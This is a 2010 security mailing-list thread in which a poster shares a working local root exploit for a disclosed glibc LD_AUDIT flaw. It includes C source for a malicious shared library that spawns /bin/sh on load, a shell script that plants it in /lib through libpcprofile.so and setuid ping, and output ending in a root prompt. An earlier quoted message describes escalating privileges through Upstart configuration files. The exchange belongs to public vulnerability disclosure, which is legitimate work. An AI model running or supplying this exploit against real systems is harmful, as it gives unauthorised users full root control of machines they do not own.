One would hope a system didn't allow just anyone to write to /lib/
On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <[email protected]> wrote:
> Hi guys,
>
>
> I finally found an easier way to gain root privileges, without
> rebooting the computer.
>
>
> The vulnerability can be used to upload a custom library to the
> server and then execute a root shell.
>
> The library is really simple (libevil.so)
>
> ----
>
> #include <errno.h>
> #include <unistd.h>
>
> static void
> __attribute__ ((constructor))
> install (void)
> {
> execl("/bin/sh", "/bin/sh", (char *) 0);
> }
>
> ----
>
> u...@host:~/$ cat ./run.sh
>
> umask 0
> gcc -c -fPIC evil.c -o evil.o
> gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
> LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so"
> ping
> cat ./libevil.so > /lib/libevil.so
> LD_AUDIT="libevil.so" ping
>
>
> u...@host:~/$ sh run.sh
> ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit
> interface: undefined symbol: la_version; ignored.
> Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w
> deadline]
> [-p pattern] [-s packetsize] [-t ttl] [-I interface]
> [-M pmtudisc-hint] [-m mark] [-S sndbuf]
> [-T tstamp-options] [-Q tos] [hop1 ...] destination
> # whoami
> root
> #
>
>
> I hope it is helpful.
>
> Regards,
>
> Xavier Garcia
>
>
>
>
> On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> > Hi guys,
> >
> > I am trying to find some ways to gain root access by using the
> > vulnerability described in the advisory
> >
> > http://marc.info/?l=full-disclosure&m=128776663124692&w=2
> >
> > published by Tavis Ormandy.
> >
> > The advisory states that Cron can be used to scalate privileges,
> > but Cron does not accept files that are writable by the group or
> > others, returning the error BAD FILE MODE.
> >
> > I have been looking for alternative ways to gain root access, but
> > there are not many places where it is possible.
> >
> > I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> > does not check the permissions and happily reads the
> > configuration files every time it restarts. This means that we can
> > create a configuration file that will instruct Upstart to
> > drop a root shell :)
> >
> >
> > The down side is that we have to be patient and wait until the
> > computer is rebooted, or use some social engineering.
> >
> >
> > You can find more details at
> >
> >
> http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
> >
> >
> > I hope this finding is interesting or usefull for the list.
> >
> > Regards,
> >
> > Xavier Garcia
> >
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
